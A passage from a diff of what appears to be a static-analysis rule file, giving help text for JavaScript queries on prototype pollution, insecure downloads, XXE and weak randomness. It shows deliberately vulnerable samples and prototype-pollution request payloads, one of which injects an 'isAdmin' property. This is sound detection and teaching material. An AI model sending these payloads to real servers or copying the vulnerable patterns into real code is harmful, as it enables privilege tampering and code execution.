below:\n\n\n```javascript\nlet express = require('express');\nlet app = express()\n\napp.put('/todos/:id', (req, res) => {\n let id = req.params.id;\n let items = req.session.todos.get(id);\n if (!items) {\n items = new Map();\n req.sessions.todos.set(id, items);\n }\n items.set(req.query.name, req.query.text);\n res.end(200);\n});\n\n```\nAnother way to fix it is to prevent the `__proto__` property from being used as a key, as shown below:\n\n\n```javascript\nlet express = require('express');\nlet app = express()\n\napp.put('/todos/:id', (req, res) => {\n let id = req.params.id;\n if (id === '__proto__' || id === 'constructor' || id === 'prototype') {\n res.end(403);\n return;\n }\n let items = req.session.todos[id];\n if 
(!items) {\n items = req.session.todos[id] = {};\n }\n items[req.query.name] = req.query.text;\n res.end(200);\n});\n\n```\n\n## References\n* MDN: [Object.prototype.__proto__](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Object/proto)\n* MDN: [Map](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Map)\n* Common Weakness Enumeration: [CWE-78](https://cwe.mitre.org/data/definitions/78.html).\n* Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n* Common Weakness Enumeration: [CWE-94](https://cwe.mitre.org/data/definitions/94.html).\n* Common Weakness Enumeration: [CWE-400](https://cwe.mitre.org/data/definitions/400.html).\n* Common Weakness Enumeration: [CWE-471](https://cwe.mitre.org/data/definitions/471.html).\n* Common Weakness Enumeration: [CWE-915](https://cwe.mitre.org/data/definitions/915.html).\n", + "markdown" : "# Prototype-polluting assignment\nMost JavaScript objects inherit the properties of the built-in `Object.prototype` object. Prototype pollution is a type of vulnerability in which an attacker is able to modify `Object.prototype`. Since most objects inherit from the compromised `Object.prototype` object, the attacker can use this to tamper with the application logic, and often escalate to remote code execution or cross-site scripting.\n\nOne way to cause prototype pollution is by modifying an object obtained via a user-controlled property name. Most objects have a special `__proto__` property that refers to `Object.prototype`. An attacker can abuse this special property to trick the application into performing unintended modifications of `Object.prototype`.\n\n\n## Recommendation\nUse an associative data structure that is resilient to untrusted key values, such as a [Map](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Map). 
In some cases, a prototype-less object created with [Object.create(null)](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Object/create) may be preferable.\n\nAlternatively, restrict the computed property name so it can't clash with a built-in property, either by prefixing it with a constant string, or by rejecting inputs that don't conform to the expected format.\n\n\n## Example\nIn the example below, the untrusted value `req.params.id` is used as the property name `req.session.todos[id]`. If a malicious user passes in the ID value `__proto__`, the variable `items` will then refer to `Object.prototype`. Finally, the modification of `items` then allows the attacker to inject arbitrary properties onto `Object.prototype`.\n\n\n```javascript\nlet express = require('express');\nlet app = express()\n\napp.put('/todos/:id', (req, res) => {\n let id = req.params.id;\n let items = req.session.todos[id];\n if (!items) {\n items = req.session.todos[id] = {};\n }\n items[req.query.name] = req.query.text;\n res.end(200);\n});\n\n```\nOne way to fix this is to use [Map](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Map) objects to associate key/value pairs instead of regular objects, as shown below:\n\n\n```javascript\nlet express = require('express');\nlet app = express()\n\napp.put('/todos/:id', (req, res) => {\n let id = req.params.id;\n let items = req.session.todos.get(id);\n if (!items) {\n items = new Map();\n req.sessions.todos.set(id, items);\n }\n items.set(req.query.name, req.query.text);\n res.end(200);\n});\n\n```\nAnother way to fix it is to prevent the `__proto__` property from being used as a key, as shown below:\n\n\n```javascript\nlet express = require('express');\nlet app = express()\n\napp.put('/todos/:id', (req, res) => {\n let id = req.params.id;\n if (id === '__proto__' || id === 'constructor' || id === 'prototype') {\n res.end(403);\n return;\n }\n let items = req.session.todos[id];\n if 
(!items) {\n items = req.session.todos[id] = {};\n }\n items[req.query.name] = req.query.text;\n res.end(200);\n});\n\n```\n\n## References\n* MDN: [Object.prototype.__proto__](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Object/proto)\n* MDN: [Map](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Map)\n* Common Weakness Enumeration: [CWE-78](https://cwe.mitre.org/data/definitions/78.html).\n* Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n* Common Weakness Enumeration: [CWE-94](https://cwe.mitre.org/data/definitions/94.html).\n* Common Weakness Enumeration: [CWE-400](https://cwe.mitre.org/data/definitions/400.html).\n* Common Weakness Enumeration: [CWE-471](https://cwe.mitre.org/data/definitions/471.html).\n* Common Weakness Enumeration: [CWE-915](https://cwe.mitre.org/data/definitions/915.html).\n" + }, + "properties" : { + "tags" : [ "security", "external/cwe/cwe-078", "external/cwe/cwe-079", "external/cwe/cwe-094", "external/cwe/cwe-400", "external/cwe/cwe-471", "external/cwe/cwe-915" ], + "description" : "Modifying an object obtained via a user-controlled property name may\n lead to accidental mutation of the built-in Object prototype,\n and possibly escalate to remote code execution or cross-site scripting.", + "id" : "js/prototype-polluting-assignment", + "kind" : "path-problem", + "name" : "Prototype-polluting assignment", + "precision" : "high", + "problem.severity" : "warning", + "security-severity" : "6.1" + } + }, { + "id" : "js/prototype-pollution-utility", + "name" : "js/prototype-pollution-utility", + "shortDescription" : { + "text" : "Prototype-polluting function" + }, + "fullDescription" : { + "text" : "Functions recursively assigning properties on objects may be the cause of accidental modification of a built-in prototype object." 
+ }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "warning" + }, + "help" : { + "text" : "# Prototype-polluting function\nMost JavaScript objects inherit the properties of the built-in `Object.prototype` object. Prototype pollution is a type of vulnerability in which an attacker is able to modify `Object.prototype`. Since most objects inherit from the compromised `Object.prototype`, the attacker can use this to tamper with the application logic, and often escalate to remote code execution or cross-site scripting.\n\nOne way to cause prototype pollution is through use of an unsafe *merge* or *extend* function to recursively copy properties from one object to another, or through the use of a *deep assignment* function to assign to an unverified chain of property names. Such a function has the potential to modify any object reachable from the destination object, and the built-in `Object.prototype` is usually reachable through the special properties `__proto__` and `constructor.prototype`.\n\n\n## Recommendation\nThe most effective place to guard against this is in the function that performs the recursive copy or deep assignment.\n\nOnly merge or assign a property recursively when it is an own property of the *destination* object. 
Alternatively, block the property names `__proto__` and `constructor` from being merged or assigned to.\n\n\n## Example\nThis function recursively copies properties from `src` to `dst`:\n\n\n```javascript\nfunction merge(dst, src) {\n for (let key in src) {\n if (!src.hasOwnProperty(key)) continue;\n if (isObject(dst[key])) {\n merge(dst[key], src[key]);\n } else {\n dst[key] = src[key];\n }\n }\n}\n\n```\nHowever, if `src` is the object `{\"__proto__\": {\"isAdmin\": true}}`, it will inject the property `isAdmin: true` in `Object.prototype`.\n\nThe issue can be fixed by ensuring that only own properties of the destination object are merged recursively:\n\n\n```javascript\nfunction merge(dst, src) {\n for (let key in src) {\n if (!src.hasOwnProperty(key)) continue;\n if (dst.hasOwnProperty(key) && isObject(dst[key])) {\n merge(dst[key], src[key]);\n } else {\n dst[key] = src[key];\n }\n }\n}\n\n```\nAlternatively, block the `__proto__` and `constructor` properties:\n\n\n```javascript\nfunction merge(dst, src) {\n for (let key in src) {\n if (!src.hasOwnProperty(key)) continue;\n if (key === \"__proto__\" || key === \"constructor\") continue;\n if (isObject(dst[key])) {\n merge(dst[key], src[key]);\n } else {\n dst[key] = src[key];\n }\n }\n}\n\n```\n\n## References\n* Prototype pollution attacks: [lodash](https://hackerone.com/reports/380873), [jQuery](https://hackerone.com/reports/454365), [extend](https://hackerone.com/reports/381185), [just-extend](https://hackerone.com/reports/430291), [merge.recursive](https://hackerone.com/reports/381194).\n* Common Weakness Enumeration: [CWE-78](https://cwe.mitre.org/data/definitions/78.html).\n* Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n* Common Weakness Enumeration: [CWE-94](https://cwe.mitre.org/data/definitions/94.html).\n* Common Weakness Enumeration: [CWE-400](https://cwe.mitre.org/data/definitions/400.html).\n* Common Weakness Enumeration: 
[CWE-471](https://cwe.mitre.org/data/definitions/471.html).\n* Common Weakness Enumeration: [CWE-915](https://cwe.mitre.org/data/definitions/915.html).\n", + "markdown" : "# Prototype-polluting function\nMost JavaScript objects inherit the properties of the built-in `Object.prototype` object. Prototype pollution is a type of vulnerability in which an attacker is able to modify `Object.prototype`. Since most objects inherit from the compromised `Object.prototype`, the attacker can use this to tamper with the application logic, and often escalate to remote code execution or cross-site scripting.\n\nOne way to cause prototype pollution is through use of an unsafe *merge* or *extend* function to recursively copy properties from one object to another, or through the use of a *deep assignment* function to assign to an unverified chain of property names. Such a function has the potential to modify any object reachable from the destination object, and the built-in `Object.prototype` is usually reachable through the special properties `__proto__` and `constructor.prototype`.\n\n\n## Recommendation\nThe most effective place to guard against this is in the function that performs the recursive copy or deep assignment.\n\nOnly merge or assign a property recursively when it is an own property of the *destination* object. 
Alternatively, block the property names `__proto__` and `constructor` from being merged or assigned to.\n\n\n## Example\nThis function recursively copies properties from `src` to `dst`:\n\n\n```javascript\nfunction merge(dst, src) {\n for (let key in src) {\n if (!src.hasOwnProperty(key)) continue;\n if (isObject(dst[key])) {\n merge(dst[key], src[key]);\n } else {\n dst[key] = src[key];\n }\n }\n}\n\n```\nHowever, if `src` is the object `{\"__proto__\": {\"isAdmin\": true}}`, it will inject the property `isAdmin: true` in `Object.prototype`.\n\nThe issue can be fixed by ensuring that only own properties of the destination object are merged recursively:\n\n\n```javascript\nfunction merge(dst, src) {\n for (let key in src) {\n if (!src.hasOwnProperty(key)) continue;\n if (dst.hasOwnProperty(key) && isObject(dst[key])) {\n merge(dst[key], src[key]);\n } else {\n dst[key] = src[key];\n }\n }\n}\n\n```\nAlternatively, block the `__proto__` and `constructor` properties:\n\n\n```javascript\nfunction merge(dst, src) {\n for (let key in src) {\n if (!src.hasOwnProperty(key)) continue;\n if (key === \"__proto__\" || key === \"constructor\") continue;\n if (isObject(dst[key])) {\n merge(dst[key], src[key]);\n } else {\n dst[key] = src[key];\n }\n }\n}\n\n```\n\n## References\n* Prototype pollution attacks: [lodash](https://hackerone.com/reports/380873), [jQuery](https://hackerone.com/reports/454365), [extend](https://hackerone.com/reports/381185), [just-extend](https://hackerone.com/reports/430291), [merge.recursive](https://hackerone.com/reports/381194).\n* Common Weakness Enumeration: [CWE-78](https://cwe.mitre.org/data/definitions/78.html).\n* Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n* Common Weakness Enumeration: [CWE-94](https://cwe.mitre.org/data/definitions/94.html).\n* Common Weakness Enumeration: [CWE-400](https://cwe.mitre.org/data/definitions/400.html).\n* Common Weakness Enumeration: 
[CWE-471](https://cwe.mitre.org/data/definitions/471.html).\n* Common Weakness Enumeration: [CWE-915](https://cwe.mitre.org/data/definitions/915.html).\n" + }, + "properties" : { + "tags" : [ "security", "external/cwe/cwe-078", "external/cwe/cwe-079", "external/cwe/cwe-094", "external/cwe/cwe-400", "external/cwe/cwe-471", "external/cwe/cwe-915" ], + "description" : "Functions recursively assigning properties on objects may be\n the cause of accidental modification of a built-in prototype object.", + "id" : "js/prototype-pollution-utility", + "kind" : "path-problem", + "name" : "Prototype-polluting function", + "precision" : "high", + "problem.severity" : "warning", + "security-severity" : "6.1" + } + }, { + "id" : "js/prototype-pollution", + "name" : "js/prototype-pollution", + "shortDescription" : { + "text" : "Prototype-polluting merge call" + }, + "fullDescription" : { + "text" : "Recursively merging a user-controlled object into another object can allow an attacker to modify the built-in Object prototype, and possibly escalate to remote code execution or cross-site scripting." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "error" + }, + "help" : { + "text" : "# Prototype-polluting merge call\nMost JavaScript objects inherit the properties of the built-in `Object.prototype` object. Prototype pollution is a type of vulnerability in which an attacker is able to modify `Object.prototype`. Since most objects inherit from the compromised `Object.prototype`, the attacker can use this to tamper with the application logic, and often escalate to remote code execution or cross-site scripting.\n\nOne way to cause prototype pollution is through use of an unsafe *merge* or *extend* function to recursively copy properties from an untrusted source object. Such a call can modify any object reachable from the destination object, and the built-in `Object.prototype` is usually reachable through the special properties `__proto__` and `constructor.prototype`. 
An attacker can abuse this by sending an object with these property names and thereby modify `Object.prototype`.\n\n\n## Recommendation\nUpdate your library dependencies in order to use a safe version of the *merge* or *extend* function. If your library has no fixed version, switch to another library.\n\n\n## Example\nIn the example below, the untrusted value `req.query.prefs` is parsed as JSON and then copied into a new object:\n\n\n```javascript\napp.get('/news', (req, res) => {\n let prefs = lodash.merge({}, JSON.parse(req.query.prefs));\n})\n\n```\nPrior to lodash 4.17.11 this would be vulnerable to prototype pollution. An attacker could send the following GET request:\n\n```\nGET /news?prefs={\"constructor\":{\"prototype\":{\"xxx\":true}}}\n```\nThis causes the `xxx` property to be injected on `Object.prototype`. Fix this by updating the lodash version:\n\n\n```json\n{\n \"dependencies\": {\n \"lodash\": \"^4.17.12\"\n }\n}\n\n```\nNote that some web frameworks, such as Express, parse query parameters using extended URL-encoding by default. When this is the case, the application may be vulnerable even if not using `JSON.parse`. 
The example below would also be susceptible to prototype pollution:\n\n\n```javascript\napp.get('/news', (req, res) => {\n let config = lodash.merge({}, {\n prefs: req.query.prefs\n });\n})\n\n```\nIn the above example, an attacker can cause prototype pollution by sending the following GET request:\n\n```\nGET /news?prefs[constructor][prototype][xxx]=true\n```\n\n## References\n* Prototype pollution attacks: [lodash](https://hackerone.com/reports/380873), [jQuery](https://hackerone.com/reports/454365), [extend](https://hackerone.com/reports/381185), [just-extend](https://hackerone.com/reports/430291), [merge.recursive](https://hackerone.com/reports/381194).\n* Express: [urlencoded()](https://expressjs.com/en/api.html#express.urlencoded)\n* Common Weakness Enumeration: [CWE-78](https://cwe.mitre.org/data/definitions/78.html).\n* Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n* Common Weakness Enumeration: [CWE-94](https://cwe.mitre.org/data/definitions/94.html).\n* Common Weakness Enumeration: [CWE-400](https://cwe.mitre.org/data/definitions/400.html).\n* Common Weakness Enumeration: [CWE-471](https://cwe.mitre.org/data/definitions/471.html).\n* Common Weakness Enumeration: [CWE-915](https://cwe.mitre.org/data/definitions/915.html).\n", + "markdown" : "# Prototype-polluting merge call\nMost JavaScript objects inherit the properties of the built-in `Object.prototype` object. Prototype pollution is a type of vulnerability in which an attacker is able to modify `Object.prototype`. Since most objects inherit from the compromised `Object.prototype`, the attacker can use this to tamper with the application logic, and often escalate to remote code execution or cross-site scripting.\n\nOne way to cause prototype pollution is through use of an unsafe *merge* or *extend* function to recursively copy properties from an untrusted source object. 
Such a call can modify any object reachable from the destination object, and the built-in `Object.prototype` is usually reachable through the special properties `__proto__` and `constructor.prototype`. An attacker can abuse this by sending an object with these property names and thereby modify `Object.prototype`.\n\n\n## Recommendation\nUpdate your library dependencies in order to use a safe version of the *merge* or *extend* function. If your library has no fixed version, switch to another library.\n\n\n## Example\nIn the example below, the untrusted value `req.query.prefs` is parsed as JSON and then copied into a new object:\n\n\n```javascript\napp.get('/news', (req, res) => {\n let prefs = lodash.merge({}, JSON.parse(req.query.prefs));\n})\n\n```\nPrior to lodash 4.17.11 this would be vulnerable to prototype pollution. An attacker could send the following GET request:\n\n```\nGET /news?prefs={\"constructor\":{\"prototype\":{\"xxx\":true}}}\n```\nThis causes the `xxx` property to be injected on `Object.prototype`. Fix this by updating the lodash version:\n\n\n```json\n{\n \"dependencies\": {\n \"lodash\": \"^4.17.12\"\n }\n}\n\n```\nNote that some web frameworks, such as Express, parse query parameters using extended URL-encoding by default. When this is the case, the application may be vulnerable even if not using `JSON.parse`. 
The example below would also be susceptible to prototype pollution:\n\n\n```javascript\napp.get('/news', (req, res) => {\n let config = lodash.merge({}, {\n prefs: req.query.prefs\n });\n})\n\n```\nIn the above example, an attacker can cause prototype pollution by sending the following GET request:\n\n```\nGET /news?prefs[constructor][prototype][xxx]=true\n```\n\n## References\n* Prototype pollution attacks: [lodash](https://hackerone.com/reports/380873), [jQuery](https://hackerone.com/reports/454365), [extend](https://hackerone.com/reports/381185), [just-extend](https://hackerone.com/reports/430291), [merge.recursive](https://hackerone.com/reports/381194).\n* Express: [urlencoded()](https://expressjs.com/en/api.html#express.urlencoded)\n* Common Weakness Enumeration: [CWE-78](https://cwe.mitre.org/data/definitions/78.html).\n* Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n* Common Weakness Enumeration: [CWE-94](https://cwe.mitre.org/data/definitions/94.html).\n* Common Weakness Enumeration: [CWE-400](https://cwe.mitre.org/data/definitions/400.html).\n* Common Weakness Enumeration: [CWE-471](https://cwe.mitre.org/data/definitions/471.html).\n* Common Weakness Enumeration: [CWE-915](https://cwe.mitre.org/data/definitions/915.html).\n" + }, + "properties" : { + "tags" : [ "security", "external/cwe/cwe-078", "external/cwe/cwe-079", "external/cwe/cwe-094", "external/cwe/cwe-400", "external/cwe/cwe-471", "external/cwe/cwe-915" ], + "description" : "Recursively merging a user-controlled object into another object\n can allow an attacker to modify the built-in Object prototype,\n and possibly escalate to remote code execution or cross-site scripting.", + "id" : "js/prototype-pollution", + "kind" : "path-problem", + "name" : "Prototype-polluting merge call", + "precision" : "high", + "problem.severity" : "error", + "security-severity" : "6.1" + } + }, { + "id" : "js/insecure-download", + "name" : "js/insecure-download", + 
"shortDescription" : { + "text" : "Download of sensitive file through insecure connection" + }, + "fullDescription" : { + "text" : "Downloading executables and other sensitive files over an insecure connection opens up for potential man-in-the-middle attacks." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "error" + }, + "help" : { + "text" : "# Download of sensitive file through insecure connection\nDownloading executables or other sensitive files over an unencrypted connection can leave a server open to man-in-the-middle attacks (MITM). Such an attack can allow an attacker to insert arbitrary content into the downloaded file, and in the worst case, allow the attacker to execute arbitrary code on the vulnerable system.\n\n\n## Recommendation\nUse a secure transfer protocol when downloading executables or other sensitive files.\n\n\n## Example\nIn this example, a server downloads a shell script from a remote URL using the `node-fetch` library, and then executes this shell script.\n\n\n```javascript\nconst fetch = require(\"node-fetch\");\nconst cp = require(\"child_process\");\n\nfetch('http://mydownload.example.org/myscript.sh')\n .then(res => res.text())\n .then(script => cp.execSync(script));\n```\nThe HTTP protocol is vulnerable to MITM, and thus an attacker could potentially replace the downloaded shell script with arbitrary code, which gives the attacker complete control over the system.\n\nThe issue has been fixed in the example below by replacing the HTTP protocol with the HTTPS protocol.\n\n\n```javascript\nconst fetch = require(\"node-fetch\");\nconst cp = require(\"child_process\");\n\nfetch('https://mydownload.example.org/myscript.sh')\n .then(res => res.text())\n .then(script => cp.execSync(script));\n```\n\n## References\n* Wikipedia: [Man-in-the-middle attack](https://en.wikipedia.org/wiki/Man-in-the-middle_attack)\n* Common Weakness Enumeration: [CWE-829](https://cwe.mitre.org/data/definitions/829.html).\n", + "markdown" : "# 
Download of sensitive file through insecure connection\nDownloading executables or other sensitive files over an unencrypted connection can leave a server open to man-in-the-middle attacks (MITM). Such an attack can allow an attacker to insert arbitrary content into the downloaded file, and in the worst case, allow the attacker to execute arbitrary code on the vulnerable system.\n\n\n## Recommendation\nUse a secure transfer protocol when downloading executables or other sensitive files.\n\n\n## Example\nIn this example, a server downloads a shell script from a remote URL using the `node-fetch` library, and then executes this shell script.\n\n\n```javascript\nconst fetch = require(\"node-fetch\");\nconst cp = require(\"child_process\");\n\nfetch('http://mydownload.example.org/myscript.sh')\n .then(res => res.text())\n .then(script => cp.execSync(script));\n```\nThe HTTP protocol is vulnerable to MITM, and thus an attacker could potentially replace the downloaded shell script with arbitrary code, which gives the attacker complete control over the system.\n\nThe issue has been fixed in the example below by replacing the HTTP protocol with the HTTPS protocol.\n\n\n```javascript\nconst fetch = require(\"node-fetch\");\nconst cp = require(\"child_process\");\n\nfetch('https://mydownload.example.org/myscript.sh')\n .then(res => res.text())\n .then(script => cp.execSync(script));\n```\n\n## References\n* Wikipedia: [Man-in-the-middle attack](https://en.wikipedia.org/wiki/Man-in-the-middle_attack)\n* Common Weakness Enumeration: [CWE-829](https://cwe.mitre.org/data/definitions/829.html).\n" + }, + "properties" : { + "tags" : [ "security", "external/cwe/cwe-829" ], + "description" : "Downloading executables and other sensitive files over an insecure connection\n opens up for potential man-in-the-middle attacks.", + "id" : "js/insecure-download", + "kind" : "path-problem", + "name" : "Download of sensitive file through insecure connection", + "precision" : "high", + 
"problem.severity" : "error", + "security-severity" : "8.1" + } + }, { + "id" : "js/xxe", + "name" : "js/xxe", + "shortDescription" : { + "text" : "XML external entity expansion" + }, + "fullDescription" : { + "text" : "Parsing user input as an XML document with external entity expansion is vulnerable to XXE attacks." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "error" + }, + "help" : { + "text" : "# XML external entity expansion\nParsing untrusted XML files with a weakly configured XML parser may lead to an XML External Entity (XXE) attack. This type of attack uses external entity references to access arbitrary files on a system, carry out denial-of-service (DoS) attacks, or server-side request forgery. Even when the result of parsing is not returned to the user, DoS attacks are still possible and out-of-band data retrieval techniques may allow attackers to steal sensitive data.\n\n\n## Recommendation\nThe easiest way to prevent XXE attacks is to disable external entity handling when parsing untrusted data. How this is done depends on the library being used. Note that some libraries, such as recent versions of `libxml`, disable entity expansion by default, so unless you have explicitly enabled entity expansion, no further action needs to be taken.\n\n\n## Example\nThe following example uses the `libxml` XML parser to parse a string `xmlSrc`. If that string is from an untrusted source, this code may be vulnerable to an XXE attack, since the parser is invoked with the `noent` option set to `true`:\n\n\n```javascript\nconst app = require(\"express\")(),\n libxml = require(\"libxmljs\");\n\napp.post(\"upload\", (req, res) => {\n let xmlSrc = req.body,\n doc = libxml.parseXml(xmlSrc, { noent: true });\n});\n\n```\nTo guard against XXE attacks, the `noent` option should be omitted or set to `false`. This means that no entity expansion is undertaken at all, not even for standard internal entities such as `&` or `>`. 
If desired, these entities can be expanded in a separate step using utility functions provided by libraries such as [underscore](http://underscorejs.org/#unescape), [lodash](https://lodash.com/docs/4.17.15#unescape) or [he](https://github.com/mathiasbynens/he).\n\n\n```javascript\nconst app = require(\"express\")(),\n libxml = require(\"libxmljs\");\n\napp.post(\"upload\", (req, res) => {\n let xmlSrc = req.body,\n doc = libxml.parseXml(xmlSrc);\n});\n\n```\n\n## References\n* OWASP: [XML External Entity (XXE) Processing](https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Processing).\n* Timothy Morgen: [XML Schema, DTD, and Entity Attacks](https://research.nccgroup.com/2014/05/19/xml-schema-dtd-and-entity-attacks-a-compendium-of-known-techniques/).\n* Timur Yunusov, Alexey Osipov: [XML Out-Of-Band Data Retrieval](https://www.slideshare.net/qqlan/bh-ready-v4).\n* Common Weakness Enumeration: [CWE-611](https://cwe.mitre.org/data/definitions/611.html).\n* Common Weakness Enumeration: [CWE-827](https://cwe.mitre.org/data/definitions/827.html).\n", + "markdown" : "# XML external entity expansion\nParsing untrusted XML files with a weakly configured XML parser may lead to an XML External Entity (XXE) attack. This type of attack uses external entity references to access arbitrary files on a system, carry out denial-of-service (DoS) attacks, or server-side request forgery. Even when the result of parsing is not returned to the user, DoS attacks are still possible and out-of-band data retrieval techniques may allow attackers to steal sensitive data.\n\n\n## Recommendation\nThe easiest way to prevent XXE attacks is to disable external entity handling when parsing untrusted data. How this is done depends on the library being used. 
Note that some libraries, such as recent versions of `libxml`, disable entity expansion by default, so unless you have explicitly enabled entity expansion, no further action needs to be taken.\n\n\n## Example\nThe following example uses the `libxml` XML parser to parse a string `xmlSrc`. If that string is from an untrusted source, this code may be vulnerable to an XXE attack, since the parser is invoked with the `noent` option set to `true`:\n\n\n```javascript\nconst app = require(\"express\")(),\n libxml = require(\"libxmljs\");\n\napp.post(\"upload\", (req, res) => {\n let xmlSrc = req.body,\n doc = libxml.parseXml(xmlSrc, { noent: true });\n});\n\n```\nTo guard against XXE attacks, the `noent` option should be omitted or set to `false`. This means that no entity expansion is undertaken at all, not even for standard internal entities such as `&` or `>`. If desired, these entities can be expanded in a separate step using utility functions provided by libraries such as [underscore](http://underscorejs.org/#unescape), [lodash](https://lodash.com/docs/4.17.15#unescape) or [he](https://github.com/mathiasbynens/he).\n\n\n```javascript\nconst app = require(\"express\")(),\n libxml = require(\"libxmljs\");\n\napp.post(\"upload\", (req, res) => {\n let xmlSrc = req.body,\n doc = libxml.parseXml(xmlSrc);\n});\n\n```\n\n## References\n* OWASP: [XML External Entity (XXE) Processing](https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Processing).\n* Timothy Morgen: [XML Schema, DTD, and Entity Attacks](https://research.nccgroup.com/2014/05/19/xml-schema-dtd-and-entity-attacks-a-compendium-of-known-techniques/).\n* Timur Yunusov, Alexey Osipov: [XML Out-Of-Band Data Retrieval](https://www.slideshare.net/qqlan/bh-ready-v4).\n* Common Weakness Enumeration: [CWE-611](https://cwe.mitre.org/data/definitions/611.html).\n* Common Weakness Enumeration: [CWE-827](https://cwe.mitre.org/data/definitions/827.html).\n" + }, + "properties" : { + "tags" : [ "security", 
"external/cwe/cwe-611", "external/cwe/cwe-827" ], + "description" : "Parsing user input as an XML document with external\n entity expansion is vulnerable to XXE attacks.", + "id" : "js/xxe", + "kind" : "path-problem", + "name" : "XML external entity expansion", + "precision" : "high", + "problem.severity" : "error", + "security-severity" : "9.1" + } + }, { + "id" : "js/insecure-randomness", + "name" : "js/insecure-randomness", + "shortDescription" : { + "text" : "Insecure randomness" + }, + "fullDescription" : { + "text" : "Using a cryptographically weak pseudo-random number generator to generate a security-sensitive value may allow an attacker to predict what value will be generated." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "warning" + }, + "help" : { + "text" : "# Insecure randomness\nUsing a cryptographically weak pseudo-random number generator to generate a security-sensitive value, such as a password, makes it easier for an attacker to predict the value.\n\nPseudo-random number generators generate a sequence of numbers that only approximates the properties of random numbers. The sequence is not truly random because it is completely determined by a relatively small set of initial values, the seed. If the random number generator is cryptographically weak, then this sequence may be easily predictable through outside observations.\n\n\n## Recommendation\nUse a cryptographically secure pseudo-random number generator if the output is to be used in a security-sensitive context. As a rule of thumb, a value should be considered \"security-sensitive\" if predicting it would allow the attacker to perform an action that they would otherwise be unable to perform. For example, if an attacker could predict the random password generated for a new user, they would be able to log in as that new user.\n\nFor JavaScript on the NodeJS platform, `crypto.getRandomBytes` provides a cryptographically secure pseudo-random byte generator. 
Note that the conversion from bytes to numbers can introduce bias that breaks the security.\n\nFor JavaScript in the browser, `RandomSource.getRandomValues` provides a cryptographically secure pseudo-random number generator.\n\n\n## Example\nThe following examples show different ways of generating a password.\n\nIn the first case, we generate a fresh password by appending a random integer to the end of a static string. The random number generator used (`Math.random`) is not cryptographically secure, so it may be possible for an attacker to predict the generated password.\n\n\n```javascript\nfunction insecurePassword() {\n // BAD: the random suffix is not cryptographically secure\n var suffix = Math.random();\n var password = \"myPassword\" + suffix;\n return password;\n}\n\n```\nIn the second example, a cryptographically secure random number generator is used for the same purpose. In this case, it is much harder to predict the generated integers.\n\n\n```javascript\nfunction securePassword() {\n // GOOD: the random suffix is cryptographically secure\n var suffix = window.crypto.getRandomValues(new Uint32Array(1))[0];\n var password = \"myPassword\" + suffix;\n return password;\n}\n\n```\n\n## References\n* Wikipedia: [Pseudo-random number generator](http://en.wikipedia.org/wiki/Pseudorandom_number_generator).\n* Mozilla Developer Network: [RandomSource.getRandomValues](https://developer.mozilla.org/en-US/docs/Web/API/RandomSource/getRandomValues).\n* NodeJS: [crypto.randomBytes](https://nodejs.org/api/crypto.html#crypto_crypto_randombytes_size_callback)\n* Common Weakness Enumeration: [CWE-338](https://cwe.mitre.org/data/definitions/338.html).\n", + "markdown" : "# Insecure randomness\nUsing a cryptographically weak pseudo-random number generator to generate a security-sensitive value, such as a password, makes it easier for an attacker to predict the value.\n\nPseudo-random number generators generate a sequence of numbers that only approximates the properties of 
random numbers. The sequence is not truly random because it is completely determined by a relatively small set of initial values, the seed. If the random number generator is cryptographically weak, then this sequence may be easily predictable through outside observations.\n\n\n## Recommendation\nUse a cryptographically secure pseudo-random number generator if the output is to be used in a security-sensitive context. As a rule of thumb, a value should be considered \"security-sensitive\" if predicting it would allow the attacker to perform an action that they would otherwise be unable to perform. For example, if an attacker could predict the random password generated for a new user, they would be able to log in as that new user.\n\nFor JavaScript on the NodeJS platform, `crypto.getRandomBytes` provides a cryptographically secure pseudo-random byte generator. Note that the conversion from bytes to numbers can introduce bias that breaks the security.\n\nFor JavaScript in the browser, `RandomSource.getRandomValues` provides a cryptographically secure pseudo-random number generator.\n\n\n## Example\nThe following examples show different ways of generating a password.\n\nIn the first case, we generate a fresh password by appending a random integer to the end of a static string. The random number generator used (`Math.random`) is not cryptographically secure, so it may be possible for an attacker to predict the generated password.\n\n\n```javascript\nfunction insecurePassword() {\n // BAD: the random suffix is not cryptographically secure\n var suffix = Math.random();\n var password = \"myPassword\" + suffix;\n return password;\n}\n\n```\nIn the second example, a cryptographically secure random number generator is used for the same purpose. 
